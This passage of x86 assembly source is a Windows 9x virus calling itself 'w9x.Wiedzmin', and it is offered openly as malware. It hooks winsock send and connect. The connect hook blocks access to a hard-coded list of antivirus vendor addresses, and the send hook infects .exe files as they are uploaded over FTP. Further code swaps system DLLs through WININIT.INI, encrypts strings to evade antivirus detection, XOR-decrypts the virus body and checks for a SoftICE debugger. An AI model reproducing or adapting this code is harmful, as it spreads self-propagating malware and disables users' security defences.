cmp edx,-1
|
|||
|
je bye
|
|||
|
|
|||
|
mov dword ptr [ebp+capis],0
|
|||
|
mov eax,dword ptr [ebp+fMapReal]
|
|||
|
mov dword ptr [ebp+wsock_h],eax
|
|||
|
|
|||
|
call @go_export
|
|||
|
|
|||
|
call _God
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [ebp+go_wsock],0
|
|||
|
|
|||
|
lea eax,[ebp+WININIT]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+winDIRr]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+sysDIR]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+rename]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_WritePrivateProfileStringA]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
bye: ret
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
;STRCAT !!! Its smaller and faster (i think - but non optimized with repz)
|
|||
|
;ENTRY:
|
|||
|
;edi - base buffer
|
|||
|
;esi - string to cut
|
|||
|
;************************************************************************************************
|
|||
|
strcat:
|
|||
|
push esi
|
|||
|
mov esi,edi
|
|||
|
sstrcat: lodsb
|
|||
|
cmp al,0
|
|||
|
jne sstrcat
|
|||
|
dec esi
|
|||
|
mov edi,esi
|
|||
|
pop esi
|
|||
|
cat_it:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je le
|
|||
|
stosb
|
|||
|
jmp cat_it
|
|||
|
le:ret
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
|
|||
|
;************************************************************************************************
|
|||
|
|
|||
|
@bad_name:
|
|||
|
xor edi,edi
|
|||
|
lea esi,[ebp+finddata.cFileName]
|
|||
|
_letra:
|
|||
|
lodsb
|
|||
|
cmp al,'a'
|
|||
|
je error_a
|
|||
|
cmp al,'A'
|
|||
|
je error_a
|
|||
|
cmp al,'E'
|
|||
|
je error_a
|
|||
|
cmp al,'e'
|
|||
|
je error_a
|
|||
|
cmp al,'v'
|
|||
|
je error_a
|
|||
|
cmp al,'V'
|
|||
|
je error_a
|
|||
|
ret
|
|||
|
|
|||
|
error_a: inc edi
|
|||
|
ret
|
|||
|
|
|||
|
;================================================================================================
|
|||
|
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ
|
|||
|
;================================================================================================
|
|||
|
|
|||
|
@GGEN_KEY:
|
|||
|
cmp dword ptr [ebp+firstk],1
|
|||
|
jne @go__
|
|||
|
mov ebx,40h
|
|||
|
mov dword ptr [ebp+key2],0h
|
|||
|
jmp GEN_KEY
|
|||
|
|
|||
|
@go__:
|
|||
|
mov dword ptr [ebp+offset key],0000000h
|
|||
|
mov ebx,55h
|
|||
|
GEN_KEY:
|
|||
|
call dword ptr [ebp+_GetTickCount]
|
|||
|
idiv ebx ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych
|
|||
|
cmp edx,ebx ;liczb niz ten T2000-Immortal Riota
|
|||
|
jae GEN_KEY
|
|||
|
inc edx ;MUSIMY COS SKODOWAC CHOCIAZ O +1
|
|||
|
cmp dword ptr [ebp+firstk],1
|
|||
|
je @go___
|
|||
|
mov dword ptr [ebp+offset key],edx
|
|||
|
@go___: mov dword ptr [ebp+offset key2],edx
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@CRYPT_BYTEZ:
|
|||
|
mov ecx,edx
|
|||
|
|
|||
|
Try_crypt:
|
|||
|
lodsb ;czytamy bajta qrwa :P jest w AL
|
|||
|
cmp al,0
|
|||
|
je _zero
|
|||
|
cmp al,07h
|
|||
|
je _retprog
|
|||
|
|
|||
|
_next: add al,cl
|
|||
|
stosb
|
|||
|
jmp Try_crypt
|
|||
|
|
|||
|
_zero: inc edi
|
|||
|
jmp Try_crypt
|
|||
|
|
|||
|
_retprog: ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@UN_CRYPT_BYTEZ:
|
|||
|
mov ecx,dword ptr [ebp+offset key]
|
|||
|
Try_uncrypt:
|
|||
|
lodsb
|
|||
|
cmp al,0h
|
|||
|
je _zero0
|
|||
|
cmp al,07h
|
|||
|
je ret0
|
|||
|
|
|||
|
|
|||
|
_next0: sub al,cl
|
|||
|
stosb
|
|||
|
jmp Try_uncrypt
|
|||
|
|
|||
|
_zero0: inc edi
|
|||
|
jmp Try_uncrypt
|
|||
|
|
|||
|
|
|||
|
ret0: ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;================================================================================================
|
|||
|
;HOOKER DATA
|
|||
|
;================================================================================================
|
|||
|
start_h:
|
|||
|
hooked_connect:
|
|||
|
call get_delta
|
|||
|
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
|
|||
|
mov edx,[esp+(10*4)] ; EDX = sockaddr
|
|||
|
mov ecx,[edx+(2*2)] ; ip
|
|||
|
shl ecx,8 ; last octet
|
|||
|
|
|||
|
lea esi,[eax+DENIED]
|
|||
|
mov edi,eax ;save EAX in EDI
|
|||
|
|
|||
|
scan_denied: lodsd
|
|||
|
dec esi
|
|||
|
shl eax,8
|
|||
|
jz TOC
|
|||
|
cmp ecx,eax
|
|||
|
jne scan_denied
|
|||
|
push WSAHOST_NOT_FOUND
|
|||
|
call dword ptr [edi+_WSASetLastError]
|
|||
|
popad
|
|||
|
push -1
|
|||
|
pop eax
|
|||
|
jmp out_c
|
|||
|
|
|||
|
|
|||
|
TOC: ;tHe oRgInal coNneCt ;]
|
|||
|
popad
|
|||
|
push [esp+0Ch] ;int namelen
|
|||
|
push [esp+4+8] ;const struct sockaddr FAR* name
|
|||
|
push [esp+8+4] ;SOCKET s
|
|||
|
call dword ptr [eax+a_connect] ;call orginal connect!!!
|
|||
|
|
|||
|
out_c: retn 0Ch
|
|||
|
|
|||
|
;//////////////////////////////////////////////hooked send///////////////////////////////////////
|
|||
|
hooked_send:
|
|||
|
call get_delta
|
|||
|
pushad
|
|||
|
mov edi,eax
|
|||
|
mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
|
|||
|
|
|||
|
mov eax,[ebx]
|
|||
|
|
|||
|
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
|
|||
|
je _ftp_store
|
|||
|
|
|||
|
TOS:
|
|||
|
popad ;tHe oRgInaL sEnd
|
|||
|
push [esp+10h] ;int flags
|
|||
|
push [esp+4+0Ch] ;int len
|
|||
|
push [esp+8+8] ;const char FAR * buf
|
|||
|
push [esp+0Ch+4] ;SOCKET s
|
|||
|
call dword ptr [eax+a_send] ;call orginal send!!!
|
|||
|
|
|||
|
|
|||
|
out_s: retn 10h
|
|||
|
|
|||
|
_ftp_store: ;yeah! infect on tha fly
|
|||
|
mov edx,[esp+28h] ;point to name =]
|
|||
|
add edx,5 ;skip STOR and one space (5 bytes)
|
|||
|
|
|||
|
mov esi,[esp+28h]
|
|||
|
@loop:
|
|||
|
lodsb
|
|||
|
cmp al,'.' ;find first dod
|
|||
|
jne @loop
|
|||
|
|
|||
|
dec esi
|
|||
|
mov esi,[esi] ;a exe file!?
|
|||
|
cmp esi,'EXE.'
|
|||
|
je try_it
|
|||
|
cmp esi,'exe.'
|
|||
|
je try_it
|
|||
|
jmp TOS
|
|||
|
|
|||
|
|
|||
|
try_it:
|
|||
|
mov ecx,edi
|
|||
|
lea edi,[ecx+offset buff]
|
|||
|
mov esi,edx
|
|||
|
xor edx,edx
|
|||
|
_l:
|
|||
|
lodsb
|
|||
|
cmp al,0dh
|
|||
|
je _end
|
|||
|
stosb
|
|||
|
inc edx
|
|||
|
jmp _l
|
|||
|
|
|||
|
mov edi,edx
|
|||
|
|
|||
|
_end:
|
|||
|
lea edx,[ecx+offset buff]
|
|||
|
lea ebx,[ecx+offset inf_prog]
|
|||
|
|
|||
|
push ecx ;preserve ecx
|
|||
|
push ebx
|
|||
|
push 260
|
|||
|
call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory
|
|||
|
;ftp clients use that to locate
|
|||
|
;file.
|
|||
|
pop ecx ;load ecx
|
|||
|
|
|||
|
mov eax,edi
|
|||
|
xor ebx,ebx
|
|||
|
lea esi,[ecx+offset inf_prog]
|
|||
|
|
|||
|
_loop_1:
|
|||
|
lodsb
|
|||
|
inc ebx
|
|||
|
cmp al,0
|
|||
|
jne _loop_1
|
|||
|
|
|||
|
_do:
|
|||
|
lea edi,[ecx+offset inf_prog] ;add \ to patch ;]
|
|||
|
add edi,ebx
|
|||
|
dec edi
|
|||
|
mov al,'\'
|
|||
|
stosb
|
|||
|
lea esi,[ecx+offset buff]
|
|||
|
|
|||
|
_l2: ;well optimised strcat
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je _skipp
|
|||
|
stosb
|
|||
|
jmp _l2
|
|||
|
|
|||
|
_skipp:
|
|||
|
lea esi,[ecx+offset santa]
|
|||
|
lea edi,[ecx+offset inf_prog2]
|
|||
|
_cat:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je _catt
|
|||
|
stosb
|
|||
|
jmp _cat
|
|||
|
|
|||
|
_catt:
|
|||
|
mov al,' '
|
|||
|
stosb
|
|||
|
|
|||
|
lea esi,[ecx+offset inf_prog]
|
|||
|
_make_real:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je done
|
|||
|
stosb
|
|||
|
jmp _make_real
|
|||
|
|
|||
|
done:
|
|||
|
mov edi,ecx
|
|||
|
|
|||
|
push 1
|
|||
|
lea eax,[edi+offset inf_prog2]
|
|||
|
push eax
|
|||
|
call dword ptr [edi+wex]
|
|||
|
|
|||
|
jmp TOS
|
|||
|
|
|||
|
|
|||
|
reset_err: push WSAECONNRESET
|
|||
|
call dword ptr [edi+_WSASetLastError]
|
|||
|
popad
|
|||
|
push -1
|
|||
|
pop eax
|
|||
|
jmp out_s
|
|||
|
;/*END-------------------------------------------------------------------------------------------
|
|||
|
get_delta:
|
|||
|
call @hookerdelta
|
|||
|
@hookerdelta:
|
|||
|
pop eax
|
|||
|
sub eax,offset @hookerdelta
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
my_data:
|
|||
|
a_send dd 0
|
|||
|
a_connect dd 0
|
|||
|
|
|||
|
msgg dd 0BFF44146h
|
|||
|
|
|||
|
DO_WPISU: _WSASetLastError dd 0
|
|||
|
wex dd 0
|
|||
|
gcd dd 0
|
|||
|
|
|||
|
|
|||
|
WSAHOST_NOT_FOUND equ 11001
|
|||
|
WSAECONNRESET equ 10054
|
|||
|
|
|||
|
|
|||
|
buff db 110 dup (0)
|
|||
|
inf_prog2 db 260 dup (0)
|
|||
|
inf_prog db 260 dup (0)
|
|||
|
santa db 'C:\Program Files\deithwen.exe',0
|
|||
|
;santa db 'C:\WINDOWS\CALC.EXE',0
|
|||
|
|
|||
|
;***********DENIED LIST*************************************************************************
|
|||
|
;thx goez to T-2000/Immortal Riot ;]
|
|||
|
|
|||
|
DENIED: DB 161,069,003 ; nai.com
|
|||
|
DB 216,122,008 ; avp.com
|
|||
|
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
|
|||
|
DB 193,247,150 ; avp.ch, metro.ch
|
|||
|
DB 194,252,006 ; datafellows.com, f-secure.com
|
|||
|
DB 195,112,025 ; drsolomon.com
|
|||
|
DB 208,228,231 ; mcafee.com
|
|||
|
DB 194,203,134 ; sophos.com
|
|||
|
DB 146,145,148 ; norman.com
|
|||
|
DB 206,204,003 ; pandasoftware.com
|
|||
|
DB 193,004,210 ; complex.is
|
|||
|
DB 203,037,250 ; leprechaun.com.au
|
|||
|
DB 141,202,248 ; cai.com
|
|||
|
DB 216,033,022 ; antivirus.com, trendmicro.com
|
|||
|
DB 216,035,137 ; sarc.com
|
|||
|
DB 216,086,104 ; virus.com
|
|||
|
DB 212,029,228 ; invircible.com
|
|||
|
DB 208,226,167 ; symantec.com
|
|||
|
DB 207,227,040 ; grisoft.com
|
|||
|
DB 194,105,193 ; drweb.ru
|
|||
|
DB 000,000,000 ; end of table.
|
|||
|
|
|||
|
hook_end label byte
|
|||
|
;________________________________________________________________________________________________
|
|||
|
;============================================================================================DATA
|
|||
|
;________________________________________________________________________________________________
|
|||
|
|
|||
|
;**APIZ TO HOOK**
|
|||
|
A1 db 'send',0
|
|||
|
A1s equ $-A1
|
|||
|
A2 db 'connect',0
|
|||
|
A2s equ $-A2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
e_esi dd 0
|
|||
|
|
|||
|
APIS db 'GetProcAddress',0
|
|||
|
APIS_SIZE = $ - APIS
|
|||
|
|
|||
|
|
|||
|
APIList: db "FindFirstFileA",0
|
|||
|
db "FindNextFileA",0
|
|||
|
db "FindClose",0
|
|||
|
db "SetFileAttributesA",0
|
|||
|
db "SetFileTime",0
|
|||
|
db "CreateFileA",0
|
|||
|
db "CreateFileMappingA",0
|
|||
|
db "MapViewOfFile",0
|
|||
|
db "UnmapViewOfFile",0
|
|||
|
db "GetFileTime",0
|
|||
|
db "GetFileSize",0
|
|||
|
db "GetFileAttributesA",0
|
|||
|
db "SetFileAttributesA",0
|
|||
|
db "ReadFile",0
|
|||
|
db "WriteFile",0
|
|||
|
db "SetFilePointer",0
|
|||
|
db "SetEndOfFile",0
|
|||
|
db "CloseHandle",0
|
|||
|
db "SetCurrentDirectoryA",0
|
|||
|
db "GetWindowsDirectoryA",0
|
|||
|
db "GetSystemDirectoryA",0
|
|||
|
db "CopyFileA",0
|
|||
|
db "ExitProcess",0
|
|||
|
db "GetTickCount",0
|
|||
|
db "GetCommandLineA",0
|
|||
|
db "IsDebuggerPresent",0
|
|||
|
db "OutputDebugStringA",0
|
|||
|
db "WinExec",0
|
|||
|
db "LoadLibraryA",0
|
|||
|
db "GetModuleHandleA",0
|
|||
|
db "Sleep",0
|
|||
|
db "GetSystemTime",0
|
|||
|
db "WritePrivateProfileStringA",0
|
|||
|
db "VirtualAlloc",0
|
|||
|
db "VirtualFree",0
|
|||
|
db "GetCurrentDirectoryA",0,07h ;07h stops the looking up
|
|||
|
|
|||
|
msg dd 0BFF44146h
|
|||
|
|
|||
|
key dd 0
|
|||
|
|
|||
|
;shit7 db "w.dll",0
|
|||
|
|
|||
|
marker db 'sru.exe',0
|
|||
|
;marker db '*.exe',0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TO_CRYPT_DATA: to_ja: db 0ah,0dh
|
|||
|
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
|||
|
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
|
|||
|
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
|||
|
db "<22> Deithwen Addan Flared Again",0ah,0dh
|
|||
|
db "<22> You have eyez, but u can't see",0ah,0dh
|
|||
|
db "<22> You have earz, but u can't hear",0ah,0dh
|
|||
|
db "<22> Wake up from unreal world before",0ah,0dh
|
|||
|
db "<22> you drown in the Sea of Chaos.",0ah,0dh
|
|||
|
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
|||
|
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
|
|||
|
db 0ah,0dh,0
|
|||
|
wsock db "\WSOCK32.dll",0
|
|||
|
nowe db "\WZZOCK32.dll",0
|
|||
|
sice9x db "\\.\SICE",0
|
|||
|
sle db "WSASetLastError",0
|
|||
|
user32 db "USER32.DLL",0
|
|||
|
gdi32 db "GDI32.DLL",0
|
|||
|
WININIT db "WININIT.INI",0
|
|||
|
rename db "rename",0
|
|||
|
jed db "X",0
|
|||
|
famil db "Verdana",0
|
|||
|
logo db ": w9x.WiEDZMiN has you :",0
|
|||
|
deshit db "kfe",0,07h
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@crypt_my_body:
|
|||
|
push ecx
|
|||
|
call dword ptr [ebp+_GetTickCount]
|
|||
|
mov ebx,255
|
|||
|
idiv ebx
|
|||
|
mov ecx,edx
|
|||
|
|
|||
|
@mutualisk:
|
|||
|
mov byte ptr [edi],90h
|
|||
|
inc edi
|
|||
|
loop @mutualisk
|
|||
|
pop ecx
|
|||
|
|
|||
|
pushad
|
|||
|
lea edx,[ebp+offset @to_this]
|
|||
|
mov eax,[ebp+key_main]
|
|||
|
mov ecx,TO_DE
|
|||
|
|
|||
|
@loop_decryptt:
|
|||
|
xor byte ptr [edx],al
|
|||
|
inc edx
|
|||
|
loop @loop_decryptt
|
|||
|
@end_de:
|
|||
|
popad
|
|||
|
rep movsb
|
|||
|
mov edi,'!PUY'
|
|||
|
call @main_decryptor
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
key_main dd 0
|
|||
|
|
|||
|
;db 5 dup (90h)
|
|||
|
|
|||
|
|
|||
|
; align dword
|
|||
|
VirusEnd label byte
|
|||
|
|
|||
|
;==================================================FIND=========================================
|
|||
|
;=============================================VirtualData nie idzie do wira=====================
|
|||
|
|
|||
|
HeapStart label byte
|
|||
|
finddata WIN32_FIND_DATA <> ;wskaznik do struktury
|
|||
|
fileHandle dd 0
|
|||
|
fileAtrib dd 0
|
|||
|
|
|||
|
|
|||
|
licznik_b dd 0
|
|||
|
|
|||
|
|
|||
|
APIListA: _FindFirstFileA dd 0
|
|||
|
_FindNextFileA dd 0
|
|||
|
_FindClose dd 0
|
|||
|
_SetAttributesA dd 0
|
|||
|
_SetFileTime dd 0
|
|||
|
_CreateFileA dd 0
|
|||
|
_CreateFileMappingA dd 0
|
|||
|
_MapViewOfFile dd 0
|
|||
|
_UnmapViewOfFile dd 0
|
|||
|
_GetFileTime dd 0
|
|||
|
_GetFileSize dd 0
|
|||
|
_GetFileAttributesA dd 0
|
|||
|
_SetFileAttributesA dd 0
|
|||
|
_ReadFile dd 0
|
|||
|
_WriteFile dd 0
|
|||
|
_SetFilePointer dd 0
|
|||
|
_SetEndOfFile dd 0
|
|||
|
_CloseHandle dd 0
|
|||
|
_SetCurrentDirectoryA dd 0
|
|||
|
_GetWindowsDirectoryA dd 0
|
|||
|
_GetSystemDirectoryA dd 0
|
|||
|
_CopyFileA dd 0
|
|||
|
_ExitProcess dd 0
|
|||
|
_GetTickCount dd 0
|
|||
|
_GetCommandLineA dd 0
|
|||
|
_IsDebuggerPresent dd 0
|
|||
|
_OutputDebugStringA dd 0
|
|||
|
_WinExec dd 0
|
|||
|
_LoadLibraryA dd 0
|
|||
|
_GetModuleHandleA dd 0
|
|||
|
_Sleep dd 0
|
|||
|
_GetSystemTime dd 0
|
|||
|
_WritePrivateProfileStringA dd 0
|
|||
|
_VirtualAlloc dd 0
|
|||
|
_VirtualFree dd 0
|
|||
|
_GetCurrentDirectoryA dd 0
|
|||
|
|
|||
|
|
|||
|
@GDI_APIZA: _CreateFontA dd 0
|
|||
|
_TextOutA dd 0
|
|||
|
_SetBkMode dd 0
|
|||
|
_SetTextColor dd 0
|
|||
|
_SelectObject dd 0
|
|||
|
_GetSystemMetrics dd 0
|
|||
|
_GetDesktopWindow dd 0
|
|||
|
_GetWindowDC dd 0
|
|||
|
_ReleaseDC dd 0
|
|||
|
|
|||
|
|
|||
|
SYSTEM_TIME: wYear dw 0
|
|||
|
wMonth dw 0
|
|||
|
wDayOfWeek dw 0
|
|||
|
wDay dw 0
|
|||
|
wHour dw 0
|
|||
|
wMinute dw 0
|
|||
|
wSecond dw 0
|
|||
|
wMilliseconds dw 0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
F1: dd 2 dup (?)
|
|||
|
F2: dd 2 dup (?)
|
|||
|
F3: dd 2 dup (?)
|
|||
|
|
|||
|
vbuf dd 0
|
|||
|
help_virus dd 0
|
|||
|
memory dd 0
|
|||
|
header dd 0
|
|||
|
align dd 0
|
|||
|
_hostIP dd 0
|
|||
|
_secAlign dd 0
|
|||
|
newEIP dd 0
|
|||
|
NewEIP dd 0
|
|||
|
firstk dd 0
|
|||
|
key2 dd 0
|
|||
|
|
|||
|
go_wsock dd 0
|
|||
|
wsock_h dd 0
|
|||
|
moj_address dd 0
|
|||
|
capis dd 0
|
|||
|
wsock_hh dd 0
|
|||
|
|
|||
|
NON dd 0 ;numbers of names
|
|||
|
AOF dd 0 ;addr of Functions
|
|||
|
AON dd 0 ;addr of Names
|
|||
|
AOO dd 0 ;addr of Ordinals
|
|||
|
|
|||
|
IndexA dd 0
|
|||
|
_GPA dd 0
|
|||
|
|
|||
|
fHnd dd 0
|
|||
|
fHndMap dd 0
|
|||
|
fMapReal dd 0
|
|||
|
fSize dd 0
|
|||
|
|
|||
|
my_seh dd 0
|
|||
|
|
|||
|
was_win dd 0
|
|||
|
ic dd 0
|
|||
|
sHnd dd 0
|
|||
|
shitsize dd 0
|
|||
|
|
|||
|
|
|||
|
oldDIR db 512 dup (?)
|
|||
|
winDIR db 260 dup (?)
|
|||
|
sysDIR db 260 dup (?)
|
|||
|
winDIRr db 260 dup (?)
|
|||
|
db 5 dup (?)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
toHOST dd 0
|
|||
|
|
|||
|
|
|||
|
; align dword
|
|||
|
HeapEnd label byte
|
|||
|
|
|||
|
|
|||
|
|
|||
|
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
|
|||
|
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
|
|||
|
db "Dearme aen a'caelme tedd",0ah,0dh
|
|||
|
db "Eigean evelienn deireadh",0ah,0dh
|
|||
|
db "Que'n esse, va en esseath",0ah,0dh
|
|||
|
db "Feainnewedd, elaine blath!"
|
|||
|
db 0ah,0dh
|
|||
|
virussizee
|
|||
|
db " bytes",0
|
|||
|
|
|||
|
fakehost:
|
|||
|
push 0h
|
|||
|
push offset titlee
|
|||
|
push offset bodyy
|
|||
|
push 0h
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
|
|||
|
push 0h
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
|
|||
|
endshit: ends
|
|||
|
|
|||
|
|
|||
|
End v_start
|